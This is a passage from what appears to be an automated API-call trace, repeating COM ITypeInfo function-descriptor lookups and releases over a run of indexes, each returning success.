(This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x70, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x71, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x72, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x73, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x74, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x75, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x76, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x77, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x78, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x79, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x80, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x81, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x82, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x83, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x84, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x85, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x86, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x87, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x88, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x89, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.353] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.353] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x90, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x91, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x92, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x93, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x94, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x95, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x96, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x97, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x98, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x99, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa0, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa2, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa3, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa4, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.354] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.354] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa6, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa8, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa9, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaa, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xab, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xac, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xad, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xae, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaf, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb0, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb2, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb3, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb4, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb6, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb8, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb9, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.355] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.355] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xba, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbb, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbc, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbd, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbe, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbf, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc0, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc2, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc3, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc4, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc6, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc8, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc9, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xca, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcb, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcc, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcd, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xce, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.356] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.356] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcf, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd0, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] 